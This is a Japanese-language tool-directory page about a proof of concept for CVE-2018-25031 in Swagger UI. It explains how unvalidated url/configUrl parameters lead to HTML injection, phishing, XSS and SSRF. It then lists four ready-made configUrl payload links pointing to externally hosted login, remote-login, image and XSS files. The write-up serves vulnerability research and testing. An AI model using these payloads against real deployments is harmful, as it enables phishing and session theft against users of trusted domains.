Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
swagger-ui — Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS]. | Kitploit
ツール/GitHubGitHub/relichunt3r/swagger-ui
フィッシングツール脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubrelichunt3r/swagger-ui

swagger-ui

Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].

リポジトリを見る
1711ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

はじめに: Swagger UI の役割

Swagger UI は、OpenAPI(旧 Swagger)仕様をインタラクティブな Web インターフェースにレンダリングする、広く使用されているライブラリです。これにより、開発者やインテグレーターはバックエンドの実装がなくても API を探索およびテストできます。

CVE‑2018‑25031 の詳細

根本原因: リモート仕様の読み込み

この脆弱性は、Swagger UI クライアントがリモート設定ファイルや仕様ファイルを読み込むために使用する URL クエリパラメータの検証が不十分であることに起因します。関連する一般的なパラメータは次のとおりです。

  • ?url=.yaml
  • ?configUrl=.json

攻撃者はこれらのパラメータを、攻撃者が管理するリモートでホストされた OpenAPI 定義または設定ファイルにポイントすることができ、脆弱なインスタンスによってレンダリングされる可能性があります。

潜在的な攻撃ベクトル

悪意のあるリモートファイルを読み込むと、ホスティング設定や実施されている保護対策に応じて、いくつかの影響の大きい結果を引き起こす可能性があります。

  1. HTML インジェクション (HTMLi) / フィッシング - 注入されたファイルには、自己ホストインスタンスの信頼されたドメインを悪用して、コンテンツを視覚的に偽装する (たとえば偽のログインフォーム) 任意の HTML を含めることができます。
  2. クロスサイトスクリプティング (XSS) - 注入されたコンテンツに実行可能な JavaScript が含まれている場合、DOM XSS が発生し、セッションの盗難やユーザーに代わった操作が可能になります。
  3. サーバーサイドリクエストフォージェリ (SSRF) - サーバーがクライアントに代わってリモート仕様をフェッチする場合、攻撃者はサーバーに内部エンドポイントへのリクエストを強制し、機密リソースを公開する可能性があります。

参考文献:

  • https://nvd.nist.gov/vuln/detail/CVE-2018-25031
  • https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

概念実証 (POC)

ペイロード

1 - ログイン

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json

2 - リモートログイン

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json

3 - 画像

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json

4 - XSS

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json

📌 免責事項

このリポジトリのコンテンツは教育および情報提供のみを目的として提供されています。著者は誤用に対する責任を負いません。使用前に適切な許可を得て、自己責任で責任を持って行動し、すべての法的および倫理的ガイドラインに従ってください。

ツールをダウンロード